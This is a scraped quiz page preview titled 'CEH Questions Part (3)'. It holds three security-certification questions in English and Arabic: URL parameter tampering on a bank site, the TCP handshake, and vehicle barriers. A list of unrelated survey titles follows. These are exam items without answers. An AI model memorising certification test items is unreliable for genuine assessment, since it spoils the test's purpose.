{"name":"CEH Questions Part (3)", "url":"https://www.quiz-maker.com/QPREVIEW","txt":"While using your bank’s online servicing you notice the following string in the URL bar: “http:\/\/www.MyPersonalBank.com\/account?id=368940911028389&Damount=10980&Camount=21 ” You observe that if you modify the Damount & Camount values and submit the request, that data on the web page reflect the changes. Which type of vulnerability is present on this site? أثناء إستخدام خدمة البنك عبر الإنترنت، تلاحظ السلسلة التالية في شريط URL: \"http:\/\/www.MyPersonalBank.com\/account?id=368940911028389&Damount=10980&Camount=21 \" تلاحظ أنه إذا قمت بتعديل قيم Damount & Camount وأرسلت الطلب، تلك البيانات على صفحة الويب تعكس التغييرات. ما هو نوع الضعف الموجود في هذا الموقع؟, The establishment of a TCP connection involves a negotiation called three-way handshake. What type of message does the client send to the server in order to begin this negotiation? يعتمد إنشاء وصلة TCP على مفاوضات تسمى المصافحة الثلاثية. ما نوع الرسالة التي يرسلها العميل إلى الخادم لبدء هذه المفاوضات؟, Which type of security feature stops vehicles from crashing through the doors of a building? ما نوع ميزة الأمان التي تمنع المركبات من الاصطدام بأبواب المبنى؟","img":"https://www.quiz-maker.com/3012/images/ogquiz.png"}
More Surveys
Round 1.1
320
Interschool Senior Sport
8418
Sports Motivation Questionnaire
DISCLAIMER: By submitting this form you are agreeing to be a participant in this study
PLEASE ASNWER ALL QUESTIONS
28140
Quiz Mat Rock Hari Ini Edisi 31 March 2017 by The Mat Rock Angler Chronicles
10512
NTU Hall Application Result Survey
9462
Which one do you think the most preferred decoration of Villa Lift that our customer will select (with 10 is the most and 1 is the least)
11628
Unlocking the value of Art - Ελευθερώνοντας την αξία της Τέχνης
630
Cornucopia 2023 Summer party Awards
18930